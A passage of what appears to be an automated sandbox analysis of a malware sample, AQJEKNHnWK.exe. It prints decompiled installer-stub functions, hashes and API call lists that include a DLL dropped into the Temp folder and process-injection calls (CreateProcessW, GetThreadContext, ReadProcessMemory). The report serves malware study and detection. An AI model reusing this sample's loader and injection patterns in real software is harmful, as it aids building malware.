                                                                    • API ID: FileMessageSend$Attributeslstrcatlstrlen$CompareTextTimeWindowlstrcpyn
                                                                    • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll$Ivlfdpdlcleoxmzl
                                                                    • API String ID: 1152937526-4235645444
                                                                    • Opcode ID: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
                                                                    • Instruction ID: f975a3bedda6f2933beab8fd4359c2ae6630d988b8a67772af92d786c35f871c
                                                                    • Opcode Fuzzy Hash: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
                                                                    • Instruction Fuzzy Hash: 0141E471901504BBDF117FA5CD869AF3AA9EF42328B20423BF512F11E1C73C4A41CAAD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00402EBD, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 173fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 95%
                                                                    			E00402EBD(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				struct _OVERLAPPED* _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t68;
				void* _t69;
				int _t74;
				long _t75;
				intOrPtr _t79;
				long _t80;
				void* _t82;
				int _t84;
				void* _t99;
				void* _t100;
				long _t101;
				int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t102 = _a16;
				_t99 = _a12;
				_v12 = _t102;
				if(_t99 == 0) {
					_v12 = 0x8000;
				}
				_v8 = 0;
				_v16 = _t99;
				if(_t99 == 0) {
					_v16 = 0x78d938;
				}
				_t66 = _a4;
				if(_a4 >= 0) {
					E004030FF( *0x7a2fd8 + _t66);
				}
				_t68 = E004030CD( &_a16, 4); // executed
				if(_t68 == 0) {
					L44:
					_push(0xfffffffd);
					goto L45;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t99 != 0) {
							if(_a16 < _t102) {
								_t102 = _a16;
							}
							if(E004030CD(_t99, _t102) != 0) {
								_v8 = _t102;
								L47:
								return _v8;
							} else {
								goto L44;
							}
						}
						if(_a16 <= 0) {
							goto L47;
						}
						while(1) {
							_t103 = _v12;
							if(_a16 < _t103) {
								_t103 = _a16;
							}
							if(E004030CD(0x789938, _t103) == 0) {
								goto L44;
							}
							_t74 = WriteFile(_a8, 0x789938, _t103,  &_a12, 0); // executed
							if(_t74 == 0 || _t103 != _a12) {
								L30:
								_push(0xfffffffe);
								L45:
								_pop(_t69);
								return _t69;
							} else {
								_v8 = _v8 + _t103;
								_a16 = _a16 - _t103;
								if(_a16 > 0) {
									continue;
								}
								goto L47;
							}
						}
						goto L44;
					}
					_t75 = GetTickCount();
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_v20 = _t75;
					 *0x40b038 = 0xb;
					 *0x40b050 = 0;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L47;
					}
					while(1) {
						L10:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E004030CD(0x789938, _t104) == 0) {
							goto L44;
						}
						_a16 = _a16 - _t104;
						 *0x40b028 = 0x789938;
						 *0x40b02c = _t104;
						while(1) {
							_t100 = _v16;
							 *0x40b030 = _t100;
							 *0x40b034 = _v12;
							_t79 = E00405D9D(0x40b028);
							_v28 = _t79;
							if(_t79 < 0) {
								break;
							}
							_t105 =  *0x40b030; // 0x78ed38
							_t106 = _t105 - _t100;
							_t80 = GetTickCount();
							_t101 = _t80;
							if(( *0x4092a0 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404D62(0,  &_v92);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L10;
								}
								goto L47;
							} else {
								if(_a12 != 0) {
									_v12 = _v12 - _t106;
									_v8 = _v8 + _t106;
									_t82 =  *0x40b030; // 0x78ed38
									_v16 = _t82;
									if(_v12 < 1) {
										goto L47;
									}
									L25:
									if(_v28 != 4) {
										continue;
									}
									goto L47;
								}
								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
								if(_t84 == 0 || _v24 != _t106) {
									goto L30;
								} else {
									_v8 = _v8 + _t106;
									goto L25;
								}
							}
						}
						_push(0xfffffffc);
						goto L45;
					}
					goto L44;
				}
			}



























                                                                    0x00402ec5
                                                                    0x00402ec9
                                                                    0x00402ed0
                                                                    0x00402ed3
                                                                    0x00402ed5
                                                                    0x00402ed5
                                                                    0x00402ede
                                                                    0x00402ee1
                                                                    0x00402ee4
                                                                    0x00402ee6
                                                                    0x00402ee6
                                                                    0x00402eed
                                                                    0x00402ef2
                                                                    0x00402efd
                                                                    0x00402efd
                                                                    0x00402f08
                                                                    0x00402f0f
                                                                    0x004030bb
                                                                    0x004030bb
                                                                    0x00000000
                                                                    0x00402f15
                                                                    0x00402f19
                                                                    0x0040305e
                                                                    0x004030ab
                                                                    0x004030ad
                                                                    0x004030ad
                                                                    0x004030b9
                                                                    0x004030c0
                                                                    0x004030c3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004030b9
                                                                    0x00403063
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040306a
                                                                    0x0040306a
                                                                    0x00403070
                                                                    0x00403072
                                                                    0x00403072
                                                                    0x0040307e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040308b
                                                                    0x00403093
                                                                    0x00403058
                                                                    0x00403058
                                                                    0x004030bd
                                                                    0x004030bd
                                                                    0x00000000
                                                                    0x0040309a
                                                                    0x0040309a
                                                                    0x0040309d
                                                                    0x004030a4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004030a6
                                                                    0x00403093
                                                                    0x00000000
                                                                    0x0040306a
                                                                    0x00402f1f
                                                                    0x00402f25
                                                                    0x00402f25
                                                                    0x00402f2c
                                                                    0x00402f32
                                                                    0x00402f39
                                                                    0x00402f3f
                                                                    0x00402f42
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402f4d
                                                                    0x00402f4d
                                                                    0x00402f4d
                                                                    0x00402f55
                                                                    0x00402f57
                                                                    0x00402f57
                                                                    0x00402f63
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402f69
                                                                    0x00402f6c
                                                                    0x00402f72
                                                                    0x00402f78
                                                                    0x00402f78
                                                                    0x00402f83
                                                                    0x00402f89
                                                                    0x00402f8e
                                                                    0x00402f95
                                                                    0x00402f98
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402f9e
                                                                    0x00402fa4
                                                                    0x00402fa6
                                                                    0x00402fb3
                                                                    0x00402fb5
                                                                    0x00402fe3
                                                                    0x00402fe9
                                                                    0x00402ff2
                                                                    0x00402ff7
                                                                    0x00402ff7
                                                                    0x00402ffe
                                                                    0x0040304c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403000
                                                                    0x00403003
                                                                    0x00403025
                                                                    0x00403028
                                                                    0x0040302b
                                                                    0x00403034
                                                                    0x00403037
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040303d
                                                                    0x00403041
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403047
                                                                    0x00403011
                                                                    0x00403019
                                                                    0x00000000
                                                                    0x00403020
                                                                    0x00403020
                                                                    0x00000000
                                                                    0x00403020
                                                                    0x00403019
                                                                    0x00402ffe
                                                                    0x00403054
                                                                    0x00000000
                                                                    0x00403054
                                                                    0x00000000
                                                                    0x00402f4d

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00402F1F
                                                                    • GetTickCount.KERNEL32 ref: 00402FA6
                                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00402FD3
                                                                    • wsprintfA.USER32 ref: 00402FE3
                                                                    • WriteFile.KERNELBASE(00000000,00000000,0078ED38,7FFFFFFF,00000000), ref: 00403011
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CountTick$FileWritewsprintf
                                                                    • String ID: ... %d%%$8x
                                                                    • API String ID: 4209647438-795837185
                                                                    • Opcode ID: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
                                                                    • Instruction ID: 8577ea5e15ae9603690e1c5729624cd70e3502ed31cd2bd6b1ef147789401905
                                                                    • Opcode Fuzzy Hash: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
                                                                    • Instruction Fuzzy Hash: 9E61AB3191220AEBCF10DF65DA48A9F7BB8EB04755F10417BF911B32C0D3789A40CBAA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 025B11F5, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 335memoryfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 025B14FE
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 025B1557
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.216143504.00000000025B0000.00000040.00000001.sdmp, Offset: 025B0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: AllocCreateFileVirtual
                                                                    • String ID: 458e3b25dbf64b28902b434edf008c50
                                                                    • API String ID: 1475775534-1886377637
                                                                    • Opcode ID: 94725aa428273180106317edf7473045fdf9b0624802bafda4125b47bf56bcd9
                                                                    • Instruction ID: a7a69332318c826a43009c48a98647d41dd52aba6ab9680bfaf8ecac3c94c514
                                                                    • Opcode Fuzzy Hash: 94725aa428273180106317edf7473045fdf9b0624802bafda4125b47bf56bcd9
                                                                    • Instruction Fuzzy Hash: 0DD14934D54388EDEB62CBE4DC19BEDBBB5BF44710F10409AE608BA1D1D7B50A84DB1A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 025B0723, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 025B0825
                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 025B09F2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.216143504.00000000025B0000.00000040.00000001.sdmp, Offset: 025B0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateFileFreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 204039940-0
                                                                    • Opcode ID: 375998578de314d3500785fa08c7003a2fd6f66092efc6279e09e04c42f1dc26
                                                                    • Instruction ID: 482cadca5c5d8bce189c5a3b63f45c4c5370d3ddde13ec6b92f592cdf3048278
                                                                    • Opcode Fuzzy Hash: 375998578de314d3500785fa08c7003a2fd6f66092efc6279e09e04c42f1dc26
                                                                    • Instruction Fuzzy Hash: 95A1E034D00209EFEF12DFA4C949BEEBBB1BF08315F20855AE515BB2A0D7755A50DB18
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004015D5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 84%
                                                                    			E004015D5(struct _SECURITY_ATTRIBUTES* __ebx, void* __eflags) {
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t27;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E00402A9A(0xfffffff0);
				_t27 = E0040555F(_t25);
				if( *_t25 != __ebx && _t27 != __ebx) {
					do {
						_t29 = E004054F7(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L5:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L5;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401428();
				} else {
					E00401428(0xffffffe6);
					E004059BF("C:\\Users\\hardz\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                                                    0x004015d5
                                                                    0x004015dc
                                                                    0x004015e6
                                                                    0x004015e8
                                                                    0x004015ee
                                                                    0x004015f6
                                                                    0x004015fc
                                                                    0x004015fe
                                                                    0x00401601
                                                                    0x00401609
                                                                    0x00401616
                                                                    0x00401623
                                                                    0x00401623
                                                                    0x00401618
                                                                    0x00401619
                                                                    0x00401621
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00401621
                                                                    0x00401616
                                                                    0x00401626
                                                                    0x00401629
                                                                    0x0040162b
                                                                    0x0040162c
                                                                    0x004015ee
                                                                    0x00401633
                                                                    0x00401653
                                                                    0x004021e8
                                                                    0x00401635
                                                                    0x00401637
                                                                    0x00401642
                                                                    0x00401648
                                                                    0x00401648
                                                                    0x00402932
                                                                    0x0040293e

                                                                    APIs
                                                                      • Part of subcall function 0040555F: CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\AQJEKNHnWK.exe" ,00000000), ref: 0040556D
                                                                      • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405572
                                                                      • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405581
                                                                    • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401601
                                                                    • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 0040160B
                                                                    • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401619
                                                                    • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401648
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\Temp, xrefs: 0040163D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                    • String ID: C:\Users\user\AppData\Local\Temp
                                                                    • API String ID: 3751793516-501415292
                                                                    • Opcode ID: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
                                                                    • Instruction ID: 09f96d0d66b1181939c381e70bae2dcc986a56c468c5fc90a5c01fc4095c1b0e
                                                                    • Opcode Fuzzy Hash: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
                                                                    • Instruction Fuzzy Hash: B2010831908181ABDB212F695D449BF7BB0DA52364B28463BF8D1B22E2C63C4946D63E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004056BF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004056BF(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                                    0x004056c3
                                                                    0x004056c9
                                                                    0x004056ca
                                                                    0x004056ca
                                                                    0x004056cb
                                                                    0x004056d2
                                                                    0x004056dc
                                                                    0x004056e9
                                                                    0x004056ec
                                                                    0x004056f4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004056f8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004056fa
                                                                    0x00000000
                                                                    0x004056fa
                                                                    0x00000000

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 004056D2
                                                                    • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?,?,C:\Users\user\AppData\Local\Temp\,Error writing temporary file. Make sure your temp folder is valid.,00403148,"C:\Users\user\Desktop\AQJEKNHnWK.exe" ,C:\Users\user\AppData\Local\Temp\), ref: 004056EC
                                                                    Strings
                                                                    • nsa, xrefs: 004056CB
                                                                    • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004056BF
                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004056C2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CountFileNameTempTick
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$nsa
                                                                    • API String ID: 1716503409-1609819632
                                                                    • Opcode ID: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                                                    • Instruction ID: fc1e422234f16816b4991f84e515e98fc6b5cd585f65b5bef5412ac6235d785f
                                                                    • Opcode Fuzzy Hash: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                                                    • Instruction Fuzzy Hash: F1F0A036748218BAE7104E55EC04B9B7FA9DF91760F14C02BFA089A1C0D6B1A95897A9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 025B0034, Relevance: 6.6, APIs: 4, Instructions: 561processthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 025B0391
                                                                    • GetThreadContext.KERNELBASE(?,00010007), ref: 025B03B4
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 025B03D8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.216143504.00000000025B0000.00000040.00000001.sdmp, Offset: 025B0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Process$ContextCreateMemoryReadThread
                                                                    • String ID:
                                                                    • API String ID: 2411489757-0
                                                                    • Opcode ID: cdf5e39767341cd2a16dc9a1a8df0fa6e35a88f8e8ed0ab30aaafd417342440f
                                                                    • Instruction ID: ac094585dcf320c5c820429ce0071f44e6b8061e80d11e717fcb64b469ff2c88
                                                                    • Opcode Fuzzy Hash: cdf5e39767341cd2a16dc9a1a8df0fa6e35a88f8e8ed0ab30aaafd417342440f
                                                                    • Instruction Fuzzy Hash: 06322731D50218AEEB61CFA4DC45BEEBBB5BF44705F20849AE509FA2E0D7705A80DF19
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040136D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 73%
                                                                    			E0040136D(signed int _a4) {
				intOrPtr* _t8;
				int _t10;
				signed int _t12;
				int _t13;
				int _t14;
				signed int _t21;
				int _t24;
				signed int _t27;
				void* _t28;

				_t27 = _a4;
				while(_t27 >= 0) {
					_t8 = _t27 * 0x1c +  *0x7a2fb0;
					__eflags =  *_t8 - 1;
					if( *_t8 == 1) {
						break;
					}
					_push(_t8); // executed
					_t10 = E00401439(); // executed
					__eflags = _t10 - 0x7fffffff;
					if(_t10 == 0x7fffffff) {
						return 0x7fffffff;
					}
					__eflags = _t10;
					if(__eflags < 0) {
						_t10 = E00405936(0x7a4000 - (_t10 + 1 << 0xa), 0x7a4000);
						__eflags = _t10;
					}
					if(__eflags != 0) {
						_t12 = _t10 - 1;
						_t21 = _t27;
						_t27 = _t12;
						_t13 = _t12 - _t21;
						__eflags = _t13;
					} else {
						_t13 = 1;
						_t27 = _t27 + 1;
					}
					__eflags =  *(_t28 + 0xc);
					if( *(_t28 + 0xc) != 0) {
						 *0x7a276c =  *0x7a276c + _t13;
						_t14 =  *0x7a2754;
						__eflags = _t14;
						_t24 = (0 | _t14 == 0x00000000) + _t14;
						__eflags = _t24;
						SendMessageA( *(_t28 + 0x18), 0x402, MulDiv( *0x7a276c, 0x7530, _t24), 0);
					}
				}
				return 0;
			}












                                                                    0x0040136e
                                                                    0x004013fb
                                                                    0x00401382
                                                                    0x00401384
                                                                    0x00401387
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00401389
                                                                    0x0040138a
                                                                    0x0040138f
                                                                    0x00401394
                                                                    0x00000000
                                                                    0x00401409
                                                                    0x00401396
                                                                    0x00401398
                                                                    0x004013a6
                                                                    0x004013ab
                                                                    0x004013ab
                                                                    0x004013ad
                                                                    0x004013b5
                                                                    0x004013b6
                                                                    0x004013b8
                                                                    0x004013ba
                                                                    0x004013ba
                                                                    0x004013af
                                                                    0x004013b1
                                                                    0x004013b2
                                                                    0x004013b2
                                                                    0x004013bc
                                                                    0x004013c1
                                                                    0x004013c3
                                                                    0x004013c9
                                                                    0x004013d2
                                                                    0x004013d7
                                                                    0x004013d7
                                                                    0x004013f5
                                                                    0x004013f5
                                                                    0x004013c1
                                                                    0x00000000

                                                                    APIs
                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E5
                                                                    • SendMessageA.USER32(00000402,00000402,00000000), ref: 004013F5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: 4@
                                                                    • API String ID: 3850602802-2385517874
                                                                    • Opcode ID: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
                                                                    • Instruction ID: c77d45609a211084429c3166b5231f0613d514cab4ec9a945a8c79bb8836a1de
                                                                    • Opcode Fuzzy Hash: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
                                                                    • Instruction Fuzzy Hash: 9201DE726242109FE7184B39DD09B3B36D8E791314F00823EBA52E66F1E67CDC028B49
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00403116, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 84%
                                                                    			E00403116(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
				E00405BFB(_t6);
				_t2 = E00405538(_t6);
				if(_t2 != 0) {
					E004054CC(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E004056BF("\"C:\\Users\\hardz\\Desktop\\AQJEKNHnWK.exe\" ", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                                                    0x00403117
                                                                    0x0040311d
                                                                    0x00403123
                                                                    0x0040312a
                                                                    0x0040312f
                                                                    0x00403137
                                                                    0x00403143
                                                                    0x00403149
                                                                    0x0040312d
                                                                    0x0040312d
                                                                    0x0040312d

                                                                    APIs
                                                                      • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                                                      • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                                                      • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                                                      • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                                                    • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
